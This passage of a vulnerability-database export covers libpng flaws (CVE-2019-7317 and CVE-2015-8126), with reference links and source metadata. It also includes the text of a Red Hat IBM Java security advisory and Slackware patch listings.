"url": "https://www.ibm.com/support/pages/node/1106553"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1106493"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-runtime-affect-ibm-netcool-agile-service-manager/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-the-ibm-sdk-java-technology-edition-affects-ibm-performance-management-products-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-sdk-affect-ibm-performance-management-products-3/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/79850"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4381/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1107879"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/152702/ubuntu-security-notice-usn-3962-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/79998"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/152664/debian-security-advisory-4435-1.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-runtime-affects-ibm-agile-lifecycle-manager/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-ibm-java-sdk-affect-ibm-performance-management-products-6/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1138432"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4293/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4466/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1074382"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/1137448"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0775/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-there-are-multiple-vulnerabilities-in-ibm-sdk-java-technology-edition-version-7-version-8-that-is-used-by-ibm-workload-scheduler/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021042108"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.1877/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9820"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11698"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-11775"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11772"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2786"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-2762"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-11772"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-2786"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-2769"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2769"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11775"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2816"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-2816"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2762"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9817"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18511"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-11698"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9797"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11691"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9819"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-11692"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9800"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9817"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9797"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-11693"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5798"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11693"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9819"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2018-18511"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9820"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11692"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9800"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-11691"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-5798"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9816"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/416.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=921355"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=59551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.mozilla.org/en-us/security/advisories/mfsa2019-15/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11697"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/67.0.1+build1-0ubuntu0.16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/1830096"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/3991-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/67.0.1+build1-0ubuntu0.19.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/67.0.1+build1-0ubuntu0.18.10.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11695"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/3991-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/67.0.1+build1-0ubuntu0.18.04.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9816"
},
{
"trust": 0.1,
"url": "https://www.mozilla.org/en-us/security/advisories/mfsa2019-14/"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14048"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7317"
},
{
"trust": 0.1,
"url": "http://slackware.com"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-14550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14550"
},
{
"trust": 0.1,
"url": "http://osuosl.org)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-14048"
},
{
"trust": 0.1,
"url": "http://slackware.com/gpg-key"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7317"
},
{
"db": "BID",
"id": "108098"
},
{
"db": "PACKETSTORM",
"id": "153157"
},
{
"db": "PACKETSTORM",
"id": "154285"
},
{
"db": "PACKETSTORM",
"id": "153212"
},
{
"db": "PACKETSTORM",
"id": "153067"
},
{
"db": "PACKETSTORM",
"id": "154457"
},
{
"db": "PACKETSTORM",
"id": "154282"
},
{
"db": "PACKETSTORM",
"id": "152561"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-012"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
},
{
"db": "NVD",
"id": "CVE-2019-7317"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2019-7317",
"ident": null
},
{
"db": "BID",
"id": "108098",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "153157",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154285",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "153212",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "153067",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154457",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154282",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "152561",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201902-012",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2019-001545",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2019-7317",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2019-02-04T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7317",
"ident": null
},
{
"date": "2019-01-25T00:00:00",
"db": "BID",
"id": "108098",
"ident": null
},
{
"date": "2019-06-03T14:44:44",
"db": "PACKETSTORM",
"id": "153157",
"ident": null
},
{
"date": "2019-09-02T17:41:04",
"db": "PACKETSTORM",
"id": "154285",
"ident": null
},
{
"date": "2019-06-06T17:02:22",
"db": "PACKETSTORM",
"id": "153212",
"ident": null
},
{
"date": "2019-05-23T16:56:40",
"db": "PACKETSTORM",
"id": "153067",
"ident": null
},
{
"date": "2019-09-11T19:58:39",
"db": "PACKETSTORM",
"id": "154457",
"ident": null
},
{
"date": "2019-09-02T17:37:20",
"db": "PACKETSTORM",
"id": "154282",
"ident": null
},
{
"date": "2019-04-18T13:08:16",
"db": "PACKETSTORM",
"id": "152561",
"ident": null
},
{
"date": "2019-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-012",
"ident": null
},
{
"date": "2019-03-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-001545",
"ident": null
},
{
"date": "2019-02-04T08:29:00.447000",
"db": "NVD",
"id": "CVE-2019-7317",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-05-23T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7317",
"ident": null
},
{
"date": "2019-01-25T00:00:00",
"db": "BID",
"id": "108098",
"ident": null
},
{
"date": "2021-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-012",
"ident": null
},
{
"date": "2022-07-05T03:02:00",
"db": "JVNDB",
"id": "JVNDB-2019-001545",
"ident": null
},
{
"date": "2024-11-21T04:48:00.033000",
"db": "NVD",
"id": "CVE-2019-7317",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-012"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libpng\u00a0 Vulnerability in using free memory in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-001545"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-012"
}
],
"trust": 0.6
}
}
VAR-201511-0126
Vulnerability from variot - Updated: 2026-03-09 23:18Multiple buffer overflows in the (1) png_set_PLTE and (2) png_get_PLTE functions in libpng before 1.0.64, 1.1.x and 1.2.x before 1.2.54, 1.3.x and 1.4.x before 1.4.17, 1.5.x before 1.5.24, and 1.6.x before 1.6.19 allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image. libpng is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. Attackers may leverage these issues to execute arbitrary code on the affected system. Failed attacks will cause denial-of-service conditions. libpng is a PNG reference library that can create, read and write PNG graphics files. 6) - i386, x86_64
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.1-ibm security update Advisory ID: RHSA-2016:0099-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0099.html Issue date: 2016-02-02 CVE Names: CVE-2015-5041 CVE-2015-7575 CVE-2015-7981 CVE-2015-8126 CVE-2015-8472 CVE-2015-8540 CVE-2016-0402 CVE-2016-0448 CVE-2016-0466 CVE-2016-0483 CVE-2016-0494 =====================================================================
- Summary:
Updated java-1.7.1-ibm packages that fix several security issues are now available for Red Hat Enterprise Linux 6 and 7 Supplementary.
Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client Supplementary (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Supplementary (v. 7) - x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 7) - x86_64
- Description:
IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Further information about these flaws can be found on the IBM Java Security alerts page, listed in the References section. (CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494)
Note: This update also disallows the use of the MD5 hash algorithm in the certification path processing. The use of MD5 can be re-enabled by removing MD5 from the jdk.certpath.disabledAlgorithms security property defined in the java.security file.
All users of java-1.7.1-ibm are advised to upgrade to these updated packages, containing the IBM Java SE 7R1 SR3-FP30 release. All running instances of IBM Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123 1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions 1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH) 1291312 - CVE-2015-8540 libpng: underflow read in png_check_keyword() 1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543) 1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054) 1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710) 1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962) 1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017) 1302689 - CVE-2015-5041 IBM JDK: J9 JVM allows code to invoke non-public interface methods
- Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.i686.rpm
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.i686.rpm
ppc64: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm
s390x: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.i686.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.i686.rpm
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm
Red Hat Enterprise Linux Client Supplementary (v. 7):
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Supplementary (v. 7):
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 7):
ppc64: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.ppc.rpm java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.ppc64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.ppc64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.ppc.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.ppc64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.ppc64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.ppc.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.ppc64.rpm
ppc64le: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm
s390x: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.s390.rpm java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.s390x.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.s390x.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.s390.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.s390x.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.s390x.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.s390x.rpm
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 7):
x86_64: java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm java-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.x86_64.rpm java-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-5041 https://access.redhat.com/security/cve/CVE-2015-7575 https://access.redhat.com/security/cve/CVE-2015-7981 https://access.redhat.com/security/cve/CVE-2015-8126 https://access.redhat.com/security/cve/CVE-2015-8472 https://access.redhat.com/security/cve/CVE-2015-8540 https://access.redhat.com/security/cve/CVE-2016-0402 https://access.redhat.com/security/cve/CVE-2016-0448 https://access.redhat.com/security/cve/CVE-2016-0466 https://access.redhat.com/security/cve/CVE-2016-0483 https://access.redhat.com/security/cve/CVE-2016-0494 https://access.redhat.com/security/updates/classification/#critical http://www.ibm.com/developerworks/java/jdk/alerts/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWsMJfXlSAg2UNWIIRArTCAKCFip8hWmQOb8eehCM0Y8CLbk2B1ACbBc+i CzP3qtAPz0FpC4vXlhIcXOg= =235r -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805, CVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842, CVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872, CVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903, CVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376, CVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494, CVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427, CVE-2016-3443, CVE-2016-3449)
Red Hat would like to thank Andrea Palazzo of Truel IT for reporting the CVE-2015-4806 issue.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/libpng-1.4.17-i486-1_slack14.1.txz: Upgraded. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8126. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/libpng-1.2.54-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/libpng-1.2.54-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/libpng-1.4.17-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/libpng-1.4.17-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/libpng-1.4.17-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/libpng-1.4.17-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpng-1.4.17-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpng-1.4.17-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpng-1.4.17-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpng-1.4.17-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.6.19-i586-1.txz
